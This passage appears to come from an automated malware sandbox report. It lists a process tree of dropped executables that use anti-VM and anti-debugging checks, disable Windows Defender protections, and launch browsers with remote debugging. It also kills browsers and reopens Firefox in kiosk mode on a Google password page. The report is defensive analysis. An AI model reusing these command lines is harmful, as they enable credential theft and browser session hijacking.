                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • System Location Discovery: System Language Discovery
                                            • Checks processor information in registry
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:5828
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                              8⤵
                                              • Uses browser remote debugging
                                              • Enumerates system info in registry
                                              • Modifies data under HKEY_USERS
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                              • Suspicious use of AdjustPrivilegeToken
                                              • Suspicious use of FindShellTrayWindow
                                              PID:4104
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa97dccc40,0x7ffa97dccc4c,0x7ffa97dccc58
                                                9⤵
                                                  PID:4932
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2060,i,9449523868293006778,1551927886069642200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1760 /prefetch:2
                                                  9⤵
                                                    PID:2116
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1900,i,9449523868293006778,1551927886069642200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2104 /prefetch:3
                                                    9⤵
                                                      PID:1244
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2268,i,9449523868293006778,1551927886069642200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2516 /prefetch:8
                                                      9⤵
                                                        PID:3040
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,9449523868293006778,1551927886069642200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3192 /prefetch:1
                                                        9⤵
                                                        • Uses browser remote debugging
                                                        PID:5280
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3200,i,9449523868293006778,1551927886069642200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3224 /prefetch:1
                                                        9⤵
                                                        • Uses browser remote debugging
                                                        PID:1780
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4532,i,9449523868293006778,1551927886069642200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4520 /prefetch:1
                                                        9⤵
                                                        • Uses browser remote debugging
                                                        PID:3448
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4700,i,9449523868293006778,1551927886069642200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4704 /prefetch:8
                                                        9⤵
                                                          PID:5204
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4696,i,9449523868293006778,1551927886069642200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4844 /prefetch:8
                                                          9⤵
                                                            PID:6100
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4252,i,9449523868293006778,1551927886069642200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4708 /prefetch:8
                                                            9⤵
                                                              PID:4584
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3728,i,9449523868293006778,1551927886069642200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4752 /prefetch:8
                                                              9⤵
                                                                PID:6128
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4736,i,9449523868293006778,1551927886069642200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4992 /prefetch:8
                                                                9⤵
                                                                  PID:5216
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4792,i,9449523868293006778,1551927886069642200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4804 /prefetch:8
                                                                  9⤵
                                                                    PID:5300
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5184,i,9449523868293006778,1551927886069642200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5180 /prefetch:8
                                                                    9⤵
                                                                      PID:5328
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4732,i,9449523868293006778,1551927886069642200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4748 /prefetch:8
                                                                      9⤵
                                                                        PID:5200
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5244,i,9449523868293006778,1551927886069642200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5228 /prefetch:2
                                                                        9⤵
                                                                        • Uses browser remote debugging
                                                                        PID:5620
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
                                                                      8⤵
                                                                      • Uses browser remote debugging
                                                                      • Enumerates system info in registry
                                                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                      PID:2408
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa97dd46f8,0x7ffa97dd4708,0x7ffa97dd4718
                                                                        9⤵
                                                                        • Checks processor information in registry
                                                                        • Enumerates system info in registry
                                                                        PID:4004
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,3098914628463819949,15505036605244440475,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
                                                                        9⤵
                                                                          PID:2748
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,3098914628463819949,15505036605244440475,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
                                                                          9⤵
                                                                            PID:5556
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,3098914628463819949,15505036605244440475,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2848 /prefetch:8
                                                                            9⤵
                                                                              PID:1472
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2136,3098914628463819949,15505036605244440475,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
                                                                              9⤵
                                                                              • Uses browser remote debugging
                                                                              PID:5564
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2136,3098914628463819949,15505036605244440475,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
                                                                              9⤵
                                                                              • Uses browser remote debugging
                                                                              PID:5532
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,3098914628463819949,15505036605244440475,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
                                                                              9⤵
                                                                                PID:3536
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2136,3098914628463819949,15505036605244440475,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2452 /prefetch:1
                                                                                9⤵
                                                                                • Uses browser remote debugging
                                                                                PID:1616
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2136,3098914628463819949,15505036605244440475,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:1
                                                                                9⤵
                                                                                • Uses browser remote debugging
                                                                                PID:4292
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,3098914628463819949,15505036605244440475,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
                                                                                9⤵
                                                                                  PID:5428
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,3098914628463819949,15505036605244440475,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2808 /prefetch:2
                                                                                  9⤵
                                                                                    PID:5988
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,3098914628463819949,15505036605244440475,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2320 /prefetch:2
                                                                                    9⤵
                                                                                      PID:5932
                                                                                • C:\Users\Admin\AppData\Local\Temp\10109710101\c8df4355c3.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\10109710101\c8df4355c3.exe"
                                                                                  7⤵
                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                  • Checks BIOS information in registry
                                                                                  • Executes dropped EXE
                                                                                  • Identifies Wine through registry keys
                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                  • Suspicious use of SetThreadContext
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:3528
                                                                                  • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                    "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                    8⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:3048
                                                                                • C:\Users\Admin\AppData\Local\Temp\10109720101\90152612cc.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\10109720101\90152612cc.exe"
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:3304
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10109720101\90152612cc.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10109720101\90152612cc.exe"
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:6096
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3304 -s 812
                                                                                    8⤵
                                                                                    • Program crash
                                                                                    PID:5720
                                                                                • C:\Users\Admin\AppData\Local\Temp\10109730101\db22f3bf8c.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\10109730101\db22f3bf8c.exe"
                                                                                  7⤵
                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                  • Checks BIOS information in registry
                                                                                  • Executes dropped EXE
                                                                                  • Identifies Wine through registry keys
                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                  • Suspicious use of SetThreadContext
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:6064
                                                                                  • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                    "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                    8⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:5476
                                                                                • C:\Users\Admin\AppData\Local\Temp\10109740101\6fb9c3f3c4.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\10109740101\6fb9c3f3c4.exe"
                                                                                  7⤵
                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                  • Checks BIOS information in registry
                                                                                  • Executes dropped EXE
                                                                                  • Identifies Wine through registry keys
                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:6112
                                                                                • C:\Users\Admin\AppData\Local\Temp\10109750101\907eb33b51.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\10109750101\907eb33b51.exe"
                                                                                  7⤵
                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                  • Downloads MZ/PE file
                                                                                  • Checks BIOS information in registry
                                                                                  • Executes dropped EXE
                                                                                  • Identifies Wine through registry keys
                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:5668
                                                                                  • C:\Users\Admin\AppData\Local\Temp\SLUSHT3F92U0JVT0FQ51LVYL.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\SLUSHT3F92U0JVT0FQ51LVYL.exe"
                                                                                    8⤵
                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                    • Checks BIOS information in registry
                                                                                    • Executes dropped EXE
                                                                                    • Identifies Wine through registry keys
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:1492
                                                                                • C:\Users\Admin\AppData\Local\Temp\10109760101\cea40917dc.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\10109760101\cea40917dc.exe"
                                                                                  7⤵
                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                  • Checks BIOS information in registry
                                                                                  • Executes dropped EXE
                                                                                  • Identifies Wine through registry keys
                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:2352
                                                                                • C:\Users\Admin\AppData\Local\Temp\10109770101\5add5ba527.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\10109770101\5add5ba527.exe"
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Suspicious use of SendNotifyMessage
                                                                                  PID:4060
                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                    taskkill /F /IM firefox.exe /T
                                                                                    8⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Kills process with taskkill
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:2556
                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                    taskkill /F /IM chrome.exe /T
                                                                                    8⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Kills process with taskkill
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:4960
                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                    taskkill /F /IM msedge.exe /T
                                                                                    8⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Kills process with taskkill
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:5616
                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                    taskkill /F /IM opera.exe /T
                                                                                    8⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Kills process with taskkill
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:228
                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                    taskkill /F /IM brave.exe /T
                                                                                    8⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Kills process with taskkill
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:5364
                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                    8⤵
                                                                                      PID:5140
                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                        9⤵
                                                                                        • Checks processor information in registry
                                                                                        • Modifies registry class
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of SendNotifyMessage
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        PID:5944
                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1984 -parentBuildID 20240401114208 -prefsHandle 1912 -prefMapHandle 1904 -prefsLen 27490 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b9e4b1d3-1a01-4cf0-9531-94e1fd3f114b} 5944 "\\.\pipe\gecko-crash-server-pipe.5944" gpu
                                                                                          10⤵
                                                                                            PID:3044
                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2420 -parentBuildID 20240401114208 -prefsHandle 2412 -prefMapHandle 2400 -prefsLen 28410 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ab607d3b-6ef0-48b7-82a7-ce55d603e1b3} 5944 "\\.\pipe\gecko-crash-server-pipe.5944" socket
                                                                                            10⤵
                                                                                              PID:1588
                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3000 -childID 1 -isForBrowser -prefsHandle 2900 -prefMapHandle 3044 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {207557f7-d438-4d09-939d-e911db0eded6} 5944 "\\.\pipe\gecko-crash-server-pipe.5944" tab
                                                                                              10⤵
                                                                                                PID:4052
                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4040 -childID 2 -isForBrowser -prefsHandle 4032 -prefMapHandle 4028 -prefsLen 32900 -prefMapSize 244658 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {27717362-e8e9-471c-a805-eafefb582687} 5944 "\\.\pipe\gecko-crash-server-pipe.5944" tab
                                                                                                10⤵
                                                                                                  PID:5604
                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4644 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4612 -prefMapHandle 4604 -prefsLen 32900 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {40a7eba5-4be4-4bd4-b9c8-c89db804e195} 5944 "\\.\pipe\gecko-crash-server-pipe.5944" utility
                                                                                                  10⤵
                                                                                                  • Checks processor information in registry
                                                                                                  PID:4960
                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5200 -childID 3 -isForBrowser -prefsHandle 5236 -prefMapHandle 5232 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {042c2e2f-8d36-4aa4-af18-2923dcc8b4f8} 5944 "\\.\pipe\gecko-crash-server-pipe.5944" tab
                                                                                                  10⤵
                                                                                                    PID:5192
                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5352 -childID 4 -isForBrowser -prefsHandle 5360 -prefMapHandle 5364 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {43bccaae-1f0b-438a-b12c-b3cf9e5fdf39} 5944 "\\.\pipe\gecko-crash-server-pipe.5944" tab
                                                                                                    10⤵
                                                                                                      PID:4416
                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5196 -childID 5 -isForBrowser -prefsHandle 5616 -prefMapHandle 5624 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b5b6e7eb-b7a7-47d7-b968-0fb5c532a9cb} 5944 "\\.\pipe\gecko-crash-server-pipe.5944" tab
                                                                                                      10⤵
                                                                                                        PID:5736
                                                                                                • C:\Users\Admin\AppData\Local\Temp\10109780101\c7621fae70.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10109780101\c7621fae70.exe"
                                                                                                  7⤵
                                                                                                  • Modifies Windows Defender DisableAntiSpyware settings
                                                                                                  • Modifies Windows Defender Real-time Protection settings
                                                                                                  • Modifies Windows Defender TamperProtection settings
                                                                                                  • Modifies Windows Defender notification settings
                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                  • Checks BIOS information in registry
                                                                                                  • Executes dropped EXE
                                                                                                  • Identifies Wine through registry keys
                                                                                                  • Windows security modification
                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:3308
                                                                                                • C:\Users\Admin\AppData\Local\Temp\10109790101\zY9sqWs.exe
